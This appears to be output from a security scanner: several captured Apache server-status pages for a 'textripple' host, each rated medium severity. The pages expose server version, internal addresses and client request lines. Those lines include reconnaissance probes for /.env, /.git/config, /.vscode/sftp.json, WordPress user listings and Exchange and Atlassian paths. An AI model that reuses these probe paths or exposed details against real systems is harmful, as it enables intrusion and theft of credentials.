23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.234180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00100.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0625130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.753160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0931230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017100.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1131220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9831290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1031190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8965160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98300.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.017140.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.003120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0437140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00060.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932674480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57190.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.760140.01.1838.56 168.143.243.30http/1.1 1-095220/208/2823_ 21.760150.01.1132.33 168.143.243.30http/1.1 1-095220/200/2775_ 21.57180.02.6233.41 168.143.243.26http/1.1 1-095220/205/2756_ 21.7601650.01.4824.13 168.143.243.30http/1.1 1-095220/213/2821_ 21.61000.01.5828.78 168.143.243.30http/1.1 1-095220/220/2830_ 21.711110.01.6523.57 168.143.243.30http/1.1 1-095220/199/2810_ 21.57000.03.9835.41 168.143.243.30http/1.1 1-095220/206/2840_ 21.760150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.750160.04.0043.00 168.143.243.26http/1.1 1-095220/210/2816_ 21.71120.01.4037.52 168.143.243.30http/1.1 1-095220/199/2793_ 21.750110.08.4739.67 168.143.243.26http/1.1 1-095220/201/2796_ 21.57190.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.740103440.05.3646.10 168.143.243.26http/1.1 1-095220/203/2809_ 21.62100.04.2546.81 168.143.243.26http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.26http/1.1 1-095220/204/2834_ 21.760140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63120.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98310.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9741220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99160.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89021910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.983330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.9063750.03.7921.42 96.7.74.180http/1.1 2-01220760/383/3037_ 42.51400.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.660780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90020.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51400.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.9137140.03.9424.64 127.0.0.1http/1.1 2-01220760/384/3025_ 42.95420.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.973320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.9163160.05.0234.70 96.7.74.180http/1.1 2-01220760/382/2988_ 42.9063150.05.2042.40 96.7.74.180http/1.1 2-01220760/377/3028_ 43.061622350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98140.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614ad8266541
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:25 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 26 seconds Server load: 0.24 0.20 0.23 Total accesses: 8186353 - Total Traffic: 207.0 GB CPU Usage: u1337.84 s208.79 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 15 requests currently being processed, 183 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no9yes216060 123840no4yes315001 286508no2yes315000 3109764no1yes018000 4116801no3yes117010 533086no1yes117000 621767no5yes315010 7125209no0yes117000 8115169no0yes018000 943856no0yes018000 10129613no3yes117010 Sum11028 15183091 __________W____W___W______R________W_R______R_______W___________ ______________W__________________W____________R_W___________W___ ______W_________________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/212/40348_ 17.98000.03.69868.70 96.7.74.175http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/249/40343_ 17.98000.03.87867.78 96.7.74.198http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/262/40558_ 18.01000.02.13988.52 96.7.74.175http/1.1localhost:80GET /.vscode/sftp.json HTTP/1.1 0-0987300/226/40522_ 18.01010.01.22854.96 96.7.74.175http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0987300/228/40327_ 17.98010.01.14924.78 96.7.74.175http/1.1trmm.us:80GET / HTTP/1.1 0-0987300/248/40610_ 18.03000.04.53963.22 96.7.74.175http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0987300/248/40599_ 18.01000.04.04887.13 96.7.74.198http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/251/40504_ 18.000120.01.44781.02 96.7.74.198http/1.1localhost:80GET /server-status HTTP/1.1 0-0987300/241/40608_ 18.020110.03.97985.88 96.7.74.198http/1.1localhost:80GET /server-status HTTP/1.1 0-0987300/225/40498_ 18.03000.01.25830.93 96.7.74.175http/1.1localhost:80GET /debug/default/view?panel=config HTTP/1.1 0-0987300/243/40326W 17.111900.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/222/40299_ 18.010340.01.14835.99 96.7.74.198http/1.1localhost:80GET /info.php HTTP/1.1 0-0987300/219/40507_ 18.02000.01.55867.49 96.7.74.198http/1.1localhost:80GET /.vscode/sftp.json HTTP/1.1 0-0987300/240/40376_ 17.98000.01.45907.11 96.7.74.175http/1.1localhost:80GET /.git/config HTTP/1.1 0-0987300/231/40493_ 18.01000.01.16854.63 96.7.74.175http/1.1localhost:80GET / HTTP/1.1 0-0987300/228/40500W 17.95000.03.95940.81 96.7.74.198http/1.1localhost:80GET /info.php HTTP/1.1 0-0987300/236/40615_ 18.03000.04.05843.94 96.7.74.175http/1.1localhost:80GET /.DS_Store HTTP/1.1 0-0987300/215/40452_ 18.02000.04.03869.38 96.7.74.198http/1.1localhost:80GET /telescope/requests HTTP/1.1 1-0238400/573/38292_ 101.89400.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079W 101.61100.07.84873.27 174.240.149.27http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/556/38211_ 101.85400.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.834120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54420.011.57932.12 96.7.74.175http/1.1 1-0238400/559/38023_ 102.002160.07.38887.80 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.58400.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.624850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55514710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.534280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.504120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84400.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.814140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46410.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85500.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.994210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 101.87400.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462700.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43400.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29500.013.07881.75 174.240.149.27http/1.1 2-0865080/195/39005_ 34.405110.08.18943.61 96.7.74.175http/1.1 2-0865080/185/38748_ 34.31400.07.62899.51 96.7.74.198http/1.1 2-0865080/198/38908_ 34.54010.07.15850.79 96.7.74.198http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0865080/190/38922_ 34.20410.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.815140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.934180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.645170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/188/38769_ 34.54000.07.15858.15 96.7.74.198http/1.1localhost:80GET /.git/config HTTP/1.1 2-0865080/196/38939_ 34.104150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20410.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.084269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614ae47dfc5e
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:25 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 26 seconds Server load: 0.24 0.20 0.23 Total accesses: 8186328 - Total Traffic: 207.0 GB CPU Usage: u1337.79 s208.78 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 16 requests currently being processed, 182 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no9yes414060 123840no4yes315001 286508no2yes216000 3109764no1yes018000 4116801no3yes117010 533086no1yes117000 621767no5yes414010 7125209no0yes018000 8115169no0yes018000 943856no0yes018000 10129613no3yes117010 Sum11028 16182091 ____L__W__WW_______W______R________W_R______R___________________ ______________W__________________W____________R_W_________L_W___ ________________________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/212/40348_ 17.98000.03.69868.70 96.7.74.175http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/249/40343_ 17.98000.03.87867.78 96.7.74.198http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/261/40557_ 17.96010.02.13988.52 96.7.74.175http/1.1localhost:80GET / HTTP/1.1 0-0987300/225/40521_ 17.95000.01.22854.96 96.7.74.175http/1.1localhost:80GET /s/0373e2236313e26333e23323/_/;/META-INF/maven/com.atlassia 0-0987300/228/40327_ 17.98010.01.14924.78 96.7.74.175http/1.1trmm.us:80GET / HTTP/1.1 0-0987300/247/40609_ 17.97000.04.53963.21 96.7.74.198http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 0-0987300/247/40598_ 17.96000.04.04887.13 96.7.74.198http/1.1localhost:80GET / HTTP/1.1 0-0987300/250/40503W 17.93000.01.43781.01 96.7.74.198http/1.1localhost:80GET /server-status HTTP/1.1 0-0987300/240/40607_ 17.940120.03.95985.87 96.7.74.175http/1.1trmm.us:80GET /server-status HTTP/1.1 0-0987300/224/40497_ 17.98000.01.25830.92 96.7.74.198http/1.1trmm.us:80GET /.env HTTP/1.1 0-0987300/243/40326W 17.111800.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/221/40298W 17.92000.01.11835.96 96.7.74.198http/1.1localhost:80GET /info.php HTTP/1.1 0-0987300/218/40506_ 17.97000.01.55867.49 96.7.74.175http/1.1trmm.us:80GET /.vscode/sftp.json HTTP/1.1 0-0987300/240/40376_ 17.98000.01.45907.11 96.7.74.175http/1.1localhost:80GET /.git/config HTTP/1.1 0-0987300/230/40492_ 17.96000.01.16854.63 96.7.74.198http/1.1localhost:80GET /about HTTP/1.1 0-0987300/228/40500_ 17.95000.03.95940.81 96.7.74.175http/1.1localhost:80GET /.env HTTP/1.1 0-0987300/235/40614_ 17.98000.04.05843.94 96.7.74.175http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0987300/214/40451_ 17.970130.04.03869.38 96.7.74.175http/1.1localhost:80GET /server-status HTTP/1.1 1-0238400/573/38292_ 101.89400.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079W 101.61100.07.84873.27 174.240.149.27http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/556/38211_ 101.85400.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.834120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54420.011.57932.12 96.7.74.175http/1.1 1-0238400/559/38023_ 102.002160.07.38887.80 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.58400.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.624850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55514710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.534280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.504120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84400.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.814140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46410.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85400.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.994210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 101.87400.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462700.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43400.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29500.013.07881.75 174.240.149.27http/1.1 2-0865080/195/39005_ 34.404110.08.18943.61 96.7.74.175http/1.1 2-0865080/185/38748_ 34.31400.07.62899.51 96.7.74.198http/1.1 2-0865080/198/38908_ 34.54010.07.15850.79 96.7.74.198http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0865080/190/38922_ 34.20410.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.814140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.934180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.645170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/187/38768_ 34.164140.07.15858.15 96.7.74.198http/1.1 2-0865080/196/38939_ 34.104150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20410.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.084269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858_ 33.86400.05.43920.53 96.7.74.175http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614a861b2e2a
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:21 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 8 minutes Server load: 0.24 0.40 0.52 Total accesses: 20260058 - Total Traffic: 725.4 GB CPU Usage: u3216.21 s350.03 cu0 cs0 - .0574% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 19 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no21yes2160210 194454no2yes117010 251755no1yes018010 3112428no26yes7110180 461164no10yes0180100 546522no3yes018030 6125153no5yes117050 7110199no1yes216000 899710no18yes3150160 9100664no7yes117050 1085785no7yes216060 Sum110101 191790860 _______R_____W____________________R_____________________R____RR_ __RR_R_R_________________________________________R____________R_ ________R____________________W__WR_____________R____W___________ _R____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/374/94005_ 34.96000.09.003072.15 2.18.255.105http/1.1crm.textripple.com:443GET /login.action HTTP/1.1 0-0404470/391/94026_ 34.92000.08.103027.17 2.18.255.73http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0404470/385/93841_ 34.80000.04.113042.70 2.18.255.73http/1.1 0-0404470/379/93648_ 34.85000.09.863106.89 2.18.255.105http/1.1 0-0404470/397/93886_ 34.92000.05.449251.75 2.18.255.73http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0404470/383/93699_ 34.83000.07.333136.41 2.18.255.73http/1.1 0-0404470/369/93815_ 34.86000.03.273033.51 2.18.255.140http/1.1 0-0404470/383/93924R 34.92000.02.573105.31 2.18.255.73http/1.1trmm.us:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 0-0404470/383/93926_ 34.94000.05.553111.34 2.18.255.73http/1.1trmm.us:80GET /login.action HTTP/1.1 0-0404470/390/93743_ 34.92000.017.613204.24 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 0-0404470/396/93856_ 34.92010.014.042995.43 2.18.255.73http/1.1 0-0404470/372/93885_ 34.83000.010.282985.04 2.18.255.73http/1.1 0-0404470/390/93867_ 34.94000.05.063027.46 2.18.255.73http/1.1localhost:80GET /about HTTP/1.1 0-0404470/399/93664W 34.82000.05.003032.88 2.18.255.105http/1.1localhost:80GET /info.php HTTP/1.1 0-0404470/393/93932_ 34.94000.011.862988.44 2.18.255.105http/1.1localhost:80GET /api/search?folderIds=0 HTTP/1.1 0-0404470/385/93626_ 34.83000.04.873182.69 2.18.255.105http/1.1 0-0404470/391/93796_ 34.890260.06.823015.34 2.18.255.105http/1.1 0-0404470/383/93874_ 34.96000.09.423060.01 2.18.255.105http/1.1crm.textripple.com:443GET /about HTTP/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.105http/1.1 1-0944540/425/99008_ 86.3901150.018.053230.87 2.18.255.105http/1.1 1-0944540/410/98770_ 86.95100.012.153192.26 2.18.255.105http/1.1 1-0944540/418/98444_ 86.88010.014.533256.26 2.18.255.73http/1.1 1-0944540/420/98864_ 86.89000.015.899440.25 2.18.255.105http/1.1 1-0944540/421/98725_ 86.490150.015.713139.65 2.18.255.140http/1.1 1-0944540/430/98937_ 86.74010.05.733143.20 2.18.255.73http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 2.18.255.73http/1.1 1-0944540/429/99145_ 86.740130.010.383174.74 2.18.255.105http/1.1 1-0944540/442/98816_ 86.860720.015.313112.75 2.18.255.73http/1.1 1-0944540/427/98656_ 86.810140.023.983228.60 2.18.255.105http/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 2.18.255.73http/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 2.18.255.73http/1.1 1-0944540/414/99182_ 86.440120.024.323260.74 2.18.255.73http/1.1 1-0944540/418/98923_ 87.36190.05.713206.39 2.18.255.73http/1.1crm.textripple.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.105http/1.1 1-0944540/434/98932R 86.763150.017.253208.65 174.211.38.70http/1.1 1-0944540/440/99071_ 86.80020.021.763257.09 2.18.255.105http/1.1 2-0517550/835/102871_ 131.040170.020.583216.97 2.18.255.105http/1.1 2-0517550/855/102726_ 130.850180.032.213162.47 2.18.255.73http/1.1 2-0517550/832/102937_ 130.571170.028.383393.79 2.18.255.105http/1.1 2-0517550/825/102950_ 131.06010.020.353177.55 2.18.255.140http/1.1 2-0517550/812/102770_ 131.02000.023.903349.39 2.18.255.73http/1.1 2-0517550/819/103075_ 131.040840.024.553310.70 2.18.255.73http/1.1 2-0517550/822/102793_ 131.28100.035.343287.32 2.18.255.105http/1.1 2-0517550/858/103204_ 130.961730.024.213330.72 2.18.255.73http/1.1 2-0517550/833/102666_ 131.14100.033.373174.36 2.18.255.73http/1.1 2-0517550/844/103060_ 130.961690.025.363188.87 2.18.255.73http/1.1 2-0517550/830/102752_ 131.43100.018.393309.79 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0517550/851/102709_ 131.15190.035.193309.72 2.18.255.73http/1.1 2-0517550/830/102524_ 131.10200.020.519564.19 2.18.255.105http/1.1 2-0517550/850/102897_ 131.092110.024.783478.47 2.18.255.105http/1.1 2-0517550/828/102743_ 131.0722630.016.443323.71 2.18.255.73http/1.1 2-0517550/835/102501_ 131.072750.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614a5f650e86
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:19 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 58 seconds Server load: 0.24 0.40 0.52 Total accesses: 20259887 - Total Traffic: 725.4 GB CPU Usage: u3380.8 s368.67 cu0 cs0 - .0604% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 33 requests currently being processed, 165 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no9yes612012 194454no4yes414002 251755no5yes315002 3112428no3yes315020 461164no4yes414003 546522no2yes216000 6125153no6yes216021 7110199no1yes117000 899710no0yes513000 9100664no9yes117021 1085785no2yes216000 Sum11045 331650711 R___R__RR__R___R______R_R_R_______R_______RR_R___________RR_R___ _____________W__R__R___W_____R________R________W_________R____R_ _________________________R_WWR___R____________R_____R___________ _R____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/371/94002R 34.08000.09.003072.14 2.18.255.73http/1.1 0-0404470/388/94023_ 34.75000.08.103027.16 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0404470/383/93839_ 34.77000.04.113042.70 188.166.147.46http/1.1client.simplismarter.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0404470/377/93646_ 34.78000.09.853106.89 2.18.255.105http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0404470/393/93882R 34.42010.05.439251.75 2.18.255.105http/1.1 0-0404470/380/93696_ 34.74010.07.333136.40 2.18.255.105http/1.1trmm.us:80GET / HTTP/1.1 0-0404470/366/93812_ 34.19000.03.263033.51 2.18.255.105http/1.1 0-0404470/380/93921R 34.1701200.02.573105.31 2.18.255.105http/1.1 0-0404470/381/93924R 34.1701120.05.553111.34 2.18.255.105http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.105http/1.1 0-0404470/391/93851_ 34.06000.014.032995.42 2.18.255.73http/1.1 0-0404470/370/93883R 34.29010.010.282985.04 2.18.255.73http/1.1 0-0404470/386/93863_ 34.37000.05.053027.46 2.18.255.105http/1.1 0-0404470/396/93661_ 34.33020.05.003032.88 2.18.255.105http/1.1 0-0404470/388/93927_ 34.050210.011.862988.44 2.18.255.105http/1.1 0-0404470/384/93625R 33.93000.04.873182.69 2.18.255.73http/1.1 0-0404470/389/93794_ 33.96000.06.803015.32 2.18.255.105http/1.1 0-0404470/380/93871_ 34.61000.09.423060.00 2.18.255.105http/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.105http/1.1 1-0944540/425/99008_ 86.3901150.018.053230.87 2.18.255.73http/1.1 1-0944540/410/98770_ 86.95000.012.153192.26 2.18.255.105http/1.1 1-0944540/418/98444_ 86.88010.014.533256.26 2.18.255.73http/1.1 1-0944540/420/98864R 86.89000.015.899440.25 2.18.255.73http/1.1 1-0944540/421/98725_ 86.490150.015.713139.65 2.18.255.73http/1.1 1-0944540/430/98937R 86.74010.05.733143.20 2.18.255.105http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 2.18.255.73http/1.1 1-0944540/429/99145R 86.740130.010.383174.74 2.18.255.105http/1.1 1-0944540/442/98816_ 86.860720.015.313112.75 2.18.255.73http/1.1 1-0944540/427/98656_ 86.810140.023.983228.60 2.18.255.105http/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 2.18.255.73http/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 2.18.255.73http/1.1 1-0944540/414/99182_ 86.440120.024.323260.74 2.18.255.73http/1.1 1-0944540/417/98922_ 86.750740.05.693206.38 2.18.255.73http/1.1 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.73http/1.1 1-0944540/434/98932R 86.761150.017.253208.65 174.211.38.70http/1.1 1-0944540/440/99071_ 86.80020.021.763257.09 2.18.255.105http/1.1 2-0517550/835/102871_ 131.041170.020.583216.97 2.18.255.105http/1.1 2-0517550/855/102726_ 130.850180.032.213162.47 2.18.255.73http/1.1 2-0517550/832/102937_ 130.571170.028.383393.79 2.18.255.56http/1.1 2-0517550/825/102950_ 131.06110.020.353177.55 2.18.255.73http/1.1 2-0517550/812/102770_ 131.02100.023.903349.39 2.18.255.105http/1.1 2-0517550/819/103075_ 131.041840.024.553310.70 2.18.255.73http/1.1 2-0517550/822/102793R 131.28100.035.343287.32 188.166.147.46http/1.1client.simplismarter.com:443GET /includes/.DS_Store HTTP/1.1 2-0517550/858/103204R 130.961730.024.213330.72 2.18.255.105http/1.1 2-0517550/833/102666_ 131.14000.033.373174.36 2.18.255.73http/1.1 2-0517550/844/103060R 130.961690.025.363188.87 2.18.255.105http/1.1 2-0517550/830/102752_ 131.43000.018.393309.79 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0517550/851/102709_ 131.15090.035.193309.72 2.18.255.73http/1.1 2-0517550/830/102524_ 131.10000.020.519564.19 2.18.255.105http/1.1 2-0517550/850/102897_ 131.090110.024.783478.47 2.18.255.105http/1.1 2-0517550/828/102743_ 131.0702630.016.443323.71 2.18.255.73http/1.1 2-0517550/835/102501_ 131.070750.019.023187.48 2.18.255.73http/1.1 2-0517550/842/102544_ 131.140
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614ac6b9a4a3
